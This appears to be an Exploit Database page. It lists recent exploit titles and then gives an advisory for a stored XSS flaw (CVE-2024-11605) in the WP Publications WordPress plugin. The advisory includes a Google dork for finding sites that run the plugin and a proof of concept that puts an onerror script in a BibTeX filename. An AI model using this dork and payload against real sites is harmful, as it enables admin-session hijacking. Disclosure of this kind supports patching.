
12 changes to exploits/shellcodes/ghdb TOTOLINK N300RB 8.54 - Command Execution MikroTik RouterOS 7.19.1 - Reflected XSS Langflow 1.2.x - Remote Code Execution (RCE) PivotX 3.0.0 RC3 - Remote Code Execution (RCE) SugarCRM 14.0.0 - SSRF/Code Injection White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) WP Publications WordPress Plugin 1.2 - Stored XSS NodeJS 24.x - Path Traversal Keras 2.15 - Remote Code Execution (RCE) Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges Microsoft Outlook - Remote Code Execution (RCE)
60 lines
No EOL
2 KiB
Text
60 lines
No EOL
2 KiB
Text
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
|
|
# Google Dork: inurl:/wp-content/plugins/wp-publications/
|
|
# Date: 2025-07-15
|
|
# Exploit Author: Zeynalxan Quliyev
|
|
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
|
|
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
|
|
# Version: <= 1.2
|
|
# Tested on: WordPress 6.5.3 / Linux (Apache)
|
|
# CVE: CVE-2024-11605
|
|
|
|
## Vulnerability Details
|
|
|
|
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
|
|
|
|
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
|
|
|
|
---
|
|
|
|
## Proof of Concept (PoC)
|
|
|
|
1. SSH into the server and navigate to the plugin directory:
|
|
```bash
|
|
cd /var/www/html/wp-content/plugins/wp-publications/
|
|
```
|
|
|
|
2. Run the following command to create a malicious BibTeX file:
|
|
```bash
|
|
touch "<img src=x onerror=alert('XSS')>.bib"
|
|
```
|
|
|
|
3. Access the plugin's BibTeX browser via the following URL:
|
|
```
|
|
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
|
|
```
|
|
|
|
4. The injected JavaScript will be executed, triggering the XSS payload:
|
|
```javascript
|
|
alert('XSS');
|
|
```
|
|
|
|
---
|
|
|
|
## Impact
|
|
|
|
* Stored XSS (JavaScript) is executed in the context of the admin panel.
|
|
* Bypasses `unfiltered_html` protection in multisite environments.
|
|
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
|
|
|
|
---
|
|
|
|
## Recommendation
|
|
|
|
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
|
|
|
|
---
|
|
|
|
## References
|
|
|
|
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
|
|
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/) |